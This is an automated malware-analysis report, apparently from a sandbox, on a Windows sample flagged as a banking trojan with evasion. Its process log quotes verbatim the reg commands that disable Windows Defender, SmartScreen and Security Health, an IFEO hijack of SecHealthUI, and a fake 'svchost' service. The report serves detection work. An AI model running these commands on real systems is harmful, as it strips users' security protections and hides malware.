Source: Packet.dll.30.dr	Binary string: HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTueMonSunGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLLCONOUT$SunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecNPF_%SSYSTEM\CurrentControlSet\Services\Tcpip\Parameters\InterfacesSYSTEM\CurrentControlSet\ServicesParametersTcpIpUseZeroBroadcastEnableDHCPDhcpIPAddressDhcpSubnetMaskIPAddressSubnetMask\Device\NPF_1394%s%sSYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}ComponentIdLinkageExportSYSTEM\CurrentControlSet\Services\Tcpip\Linkagebinddrivers\NPF.sysIphlpapiGetAdaptersAddressesairpcap.dllAirpcapGetLastErrorAirpcapGetDeviceListAirpcapFreeDeviceListAirpcapOpenAirpcapCloseAirpcapGetLinkTypeAirpcapSetKernelBufferAirpcapSetFilterAirpcapGetMacAddressAirpcapSetMinToCopyAirpcapGetReadEventAirpcapReadAirpcapGetStatsAirpcapWriteWinPcap Packet Driver (NPF)system32\drivers\NPF.sys\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileVersionSYSTEM\CurrentControlSet\Services\%s\\.\%s\\.\Global\%s%wsHx!

Source: classification engine

Classification label: mal66.bank.troj.adwa.evad.winEXE@67/106@27/4

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: RuntimeBroker.exe.0.dr, Program.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: RuntimeBroker.exe.0.dr, Program.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: install_wim_tweak.exe.0.dr, install_wim_tweak/Program.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: install_wim_tweak.exe.0.dr, install_wim_tweak/Program.cs	Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: install_wim_tweak.exe.0.dr, install_wim_tweak/Program.cs	Security API names: System.Security.AccessControl.RegistrySecurity Microsoft.Win32.RegistryKey::GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: install_wim_tweak.exe.0.dr, install_wim_tweak/Program.cs	Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: PcapDotNet.Analysis.dll.0.dr, PreEmptive.SoS.Client.Messages/UserInfo.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: PcapDotNet.Analysis.dll.0.dr, PreEmptive.SoS.Client.Messages/UserInfo.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012AF326 FormatMessageW,GetLastError,LocalFree,

32_2_012AF326

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Program Files (x86)\WinPcap

Jump to behavior

Source: ywvz5i8kT9.exe, 00000000.00000003.236588666.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.236703900.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.236742153.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp

Source: ywvz5i8kT9.exe	Virustotal: Detection: 71%
Source: ywvz5i8kT9.exe	Metadefender: Detection: 25%
Source: ywvz5i8kT9.exe	ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

File read: C:\Users\user\Desktop\ywvz5i8kT9.exe

Jump to behavior

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ywvz5i8kT9.exe "C:\Users\user\Desktop\ywvz5i8kT9.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe"
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart -burn.unelevated BurnPipe.{2D277E6C-5CDF-4BE9-BD86-D80206082B4F} {7764B93C-9D98-4483-A035-10A63673DA0D} 6716
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe" description svchost "? ???? ??? ?? ?? ???? ?? ?? ?? ??? ?? ???(VPN) ??? ?????. ? ???? ???? ??? ? ???? ????? ??? ?? ???? ???? ????.
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" config svchost start= auto
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" start svchost
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\RuntimeBroker.exe C:\Windows\SysWOW64\RuntimeBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe" description svchost "? ???? ??? ?? ?? ???? ?? ?? ?? ??? ?? ???(VPN) ??? ?????. ? ???? ???? ??? ? ???? ????? ??? ?? ???? ???? ????.	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" config svchost start= auto	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" start svchost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart -burn.unelevated BurnPipe.{2D277E6C-5CDF-4BE9-BD86-D80206082B4F} {7764B93C-9D98-4483-A035-10A63673DA0D} 6716

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012813BA GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,

32_2_012813BA

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Users\user\AppData\Local\Temp\nsp9C07.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012B50CA GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

32_2_012B50CA

Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryAs.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryAs::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryAs.cs	Suspicious method names: System.Void PcapDotNet.Packets.Gre.GreSourceRouteEntryAs::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryAs.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Gre.GreSourceRouteEntryAs::EqualsPayloads(PcapDotNet.Packets.Gre.GreSourceRouteEntry)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryAs.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Gre.GreSourceRouteEntryAs::get_PayloadHashCode()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryAs.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryAs::get_PayloadOffset()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpUnknownLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpUnknownLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpUnknownLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpUnknownLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpUnknownLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpUnknownLayer::set_Payload(PcapDotNet.Packets.Datagram)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpUnknownLayer.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Icmp.IcmpUnknownLayer::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetPayloadDatagrams.cs	Suspicious method names: PcapDotNet.Packets.IpV4.IpV4Datagram PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams::get_IpV4()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetPayloadDatagrams.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetPayloadDatagrams.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams::Get(PcapDotNet.Packets.Ethernet.EthernetType)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetPayloadDatagrams.cs	Suspicious method names: System.Void PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams::.ctor(PcapDotNet.Packets.Datagram)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetPayloadDatagrams.cs	Suspicious method names: PcapDotNet.Packets.Arp.ArpDatagram PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams::get_Arp()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.PayloadLayer::set_Data(PcapDotNet.Packets.Datagram)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.PayloadLayer::.ctor()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.PayloadLayer::Equals(PcapDotNet.Packets.PayloadLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.PayloadLayer::get_Data()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.PayloadLayer::get_Length()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.PayloadLayer::Write(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/PayloadLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.PayloadLayer::Equals(PcapDotNet.Packets.Layer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Icmp.IcmpDatagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Transport/TcpDatagram.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Transport.TcpDatagram::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Transport/TcpDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Transport.TcpDatagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreDatagram.cs	Suspicious method names: System.UInt16 PcapDotNet.Packets.Gre.GreDatagram::get_KeyPayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreDatagram.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Gre.GreDatagram::get_OffsetKeyPayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Gre.GreDatagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreDatagram.cs	Suspicious method names: PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams PcapDotNet.Packets.Gre.GreDatagram::get_PayloadDatagrams()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpRouterAdvertisementLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpRouterAdvertisementLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpRouterAdvertisementLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpRouterAdvertisementLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTraceRouteLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpTraceRouteLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpTraceRouteLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTraceRouteLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpTraceRouteLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTraceRouteLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpTraceRouteLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTraceRouteLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpTraceRouteLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Transport/UdpDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Transport.UdpDatagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntry.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Gre.GreSourceRouteEntry::get_PayloadHashCode()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntry.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntry::get_PayloadOffset()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntry.cs	Suspicious method names: System.Void PcapDotNet.Packets.Gre.GreSourceRouteEntry::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntry.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntry::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntry.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Gre.GreSourceRouteEntry::EqualsPayloads(PcapDotNet.Packets.Gre.GreSourceRouteEntry)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryIp.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryIp::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryIp.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Gre.GreSourceRouteEntryIp::EqualsPayloads(PcapDotNet.Packets.Gre.GreSourceRouteEntry)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryIp.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Gre.GreSourceRouteEntryIp::get_PayloadHashCode()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryIp.cs	Suspicious method names: System.Void PcapDotNet.Packets.Gre.GreSourceRouteEntryIp::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryIp.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryIp::get_PayloadOffset()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/IpV4/IpV4Datagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.IpV4.IpV4Datagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpIpV4PayloadDatagram.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpIpV4PayloadDatagram::CalculateIsValid()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpIpV4PayloadDatagram.cs	Suspicious method names: PcapDotNet.Packets.IpV4.IpV4Datagram PcapDotNet.Packets.Icmp.IcmpIpV4PayloadDatagram::get_IpV4()
